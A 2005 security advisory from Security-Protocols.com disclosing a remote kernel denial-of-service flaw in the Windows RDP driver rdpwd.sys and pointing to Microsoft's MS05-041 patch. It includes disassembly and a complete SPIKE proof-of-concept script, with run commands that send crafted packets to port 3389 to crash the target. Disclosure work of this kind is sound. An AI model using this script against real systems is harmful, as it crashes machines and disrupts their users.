Create an account Home Topics Downloads Your Account Submit News Top 10
Main Menu
  • Home
  • Advisories
  • Backend RSS
  • Downloads
  • Exploits
  • Feedback
  • Free Shells
  • Gallery
  • IP Index
  • Library
  • Password Generator
  • Private Messages
  • Recommend Us
  • Security Services
  • Stories Archive
  • Security Store
  • Submit News
  • Text Files
  • Top10
  • Topics
  • Tutorials
  • UNIX Man Pages
  • Web Links
  • WhitePapers
  • Your Account

  • Please Visit Our Sponsors

    Links
    Affiliate Links
  • PSP News Portal
  • PSP Wallpapers
  • SSH For PSP
  • Torrent Top Sites
  • ThemeSkype
  • YourPSP
  • Google News Feed
  • StaySecureOnline
  • PhotoBlog Top Sites
  • ihack.ms

  • Search



    Link us


    Donate

    Security-Protocols is dedicated to supporting the computer security community without bias. In doing so, we are completely non-profit and could always use some help. If you feel like making a donation, please do.


    Microsoft Windows RDP 'rdpwd.sys' Remote Kernel DoS Bugs/Errors As I previously reported, there is a remote kernel denial of serivce vulnerability with the Remote Desktop Services protocol which affects every verison of Microsoft Windows. Please read more for the full details.

    Microsoft Windows RDP 'rdpwd.sys' Remote Kernel DoS

    Release Date:
    August 9, 2005

    Date Reported:
    May 4, 2005

    Severity:
    Medium

    Vendor:
    Microsoft

    Systems Affected:
    Microsoft Windows 2000 Service Pack 4
    Microsoft Windows XP Service Pack 1
    Microsoft Windows XP Service Pack 2
    Microsoft Windows XP Professional x64 Edition
    Microsoft Windows Server 2003
    Microsoft Windows Server 2003 for Itanium-based Systems
    Microsoft Windows Server 2003 Service Pack 1
    Microsoft Windows Server 2003 with SP1 for Itanium-based Systems
    Microsoft Windows Server 2003 x64 Edition

    Overview:
    A denial of service vulnerability exists within the Remote Desktop Services which allows for an attacker to send a specially
    crafted RDP packet in order to crash the remote vulnerable system.

    This flaw specifically exists within the rdpwd.sys driver file which is used by the Remote Desktop Services.

    Technical Details:
    It appears that the problem exists because RDP does not release the memory it is using. The kernel can only use a certain
    amount of physical memory. So when RDP goes over its memory limit, it causes the crash.

    After analyzing the dump file, you can see that RDP will try and copy 7 bytes of the error point. If it follows this error
    point of whatever package it’s looking for does not have 7 bytes, the problem occurs. So what it does then is it copies the
    following data randomly into memory:

    This is taken from Windows XP SP2 rdpwd.sys verison 5.1.2600.2180.

    .text:00010579 mov ecx, [ebx+28h]
    .text:0001057C cmp edi, ecx
    .text:0001057E jbe loc_1049E ;<(-- find the error, then go to error process

    .text:0001049E push 7 ;<(-- push fix y
    .text:000104A0 push esi ;<(-- the find error point
    .text:000104A1 push 0Bh
    .text:000104A3 jmp loc_107C8

    .text:000107C8 push dword ptr [ebx+2Ch]
    .text:000107CB push dword ptr [ebx]
    .text:000107CD call _MCSProtocolErrorEvent@20 ;<(-- call error process

    .text:0002BC60 mov eax, [ebp+arg_14] ;<(-- the size is 7
    .text:0002BC63
    .text:0002BC63 loc_2BC63: ; CODE XREF: MCSProtocolErrorEvent +9E^Xj
    .text:0002BC63 test esi, esi
    .text:0002BC65 jz short loc_2BC7F
    .text:0002BC67 push edi
    .text:0002BC68 mov ecx, eax
    .text:0002BC6A mov edx, ecx
    .text:0002BC6C shr ecx, 2
    .text:0002BC6F lea edi, [ebp+var_100]
    .text:0002BC75 rep movsd


    Below is the remoteass.spk SPIKE script which reproduces this issue on Windows XP SP2:

    // Windows XP SP2 'rdpwd.sys' Remote Kernel DoS
    //
    // Discovered by:
    // Tom Ferris
    // tommy[at]security-protocols[dot]com
    //
    // Tested on:
    // Microsoft Windows XP SP2
    //
    // Usage: ./generic_send_tcp 192.168.1.100 3389 remoteass.spk 1 0
    //
    // 8/9/2005 Security-Protocols.com
    //
    // This program is free software; you can redistribute it and/or modify it under
    // the terms of the GNU General Public License version 2, 1991 as published by
    // the Free Software Foundation.

    s_block_start("packet_1");
    s_string_variable("03");
    s_binary("03 00 00 27 22 E0 00 00 00 00 00 43 6F 6F 6B 69 65 3A 20 6D 73 74 73 68 61 73 68 3D 41 64 6D 69 6E 69 73 74 72 0D
    0A");
    s_binary("03 00 00 27 22 E0 00 00 00 00 00 43 6F 6F 6B 69 65 3A");
    s_string_variable("");
    s_binary("41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41");
    s_string_variable("");
    s_block_end("packet_1");

    s_block_start("packet_2");
    s_int_variable(0x0500,5);
    s_block_end("packet_2");

    s_block_start("packet_3");
    s_binary("000002020000");
    s_string_variable("");
    s_block_end("packet_3");

    This is how the script should be ran:

    ./generic_send_tcp 192.168.1.102 3389 remoteass.spk 1 0

    Vendor Status:
    Microsoft has released a patch for this issue:

    MS05-041

    Discovered by:
    Tom Ferris

    Related Links:
    www.security-protocols.com/released/xp-sp2-rdp-dos.rar
    www.microsoft.com/technet/security/advisory/904797.mspx
    www.microsoft.com/technet/security/Bulletin/MS05-041.mspx

    Greetings:
    c0nnie, chicofleeco, ac1djazz, costa rica mike, modify, the angrypacket krew and michael.

    Copyright (c) 2005 Security-Protocols.com

    Posted on Tuesday, August 09 @ 10:43:08 PDT by badpack3t



     
    Login
    Nickname

    Password

    Don't have an account yet? You can create one. As a registered user you have some advantages like theme manager, comments configuration and post comments with your name.

    Related Links
    · More about Bugs/Errors
    · News by badpack3t


    Most read story about Bugs/Errors:
    Mozilla Firefox IDN ''Host:'' Buffer Overflow


    Article Rating
    Average Score: 5
    Votes: 10


    Please take a second and vote for this article:

    Excellent
    Very Good
    Good
    Regular
    Bad


    Options

     Printer Friendly Printer Friendly

     Send to a Friend Send to a Friend


    ".:User's Login:." | Login/Create an Account | 0 comments
    The comments are owned by the poster. We aren't responsible for their content.

    No Comments Allowed for Anonymous, please register
    Copyright © 2000 - 2005 Security-Protocols.com All Rights Reserved

    Website engine code is © copyright by PHP-Nuke.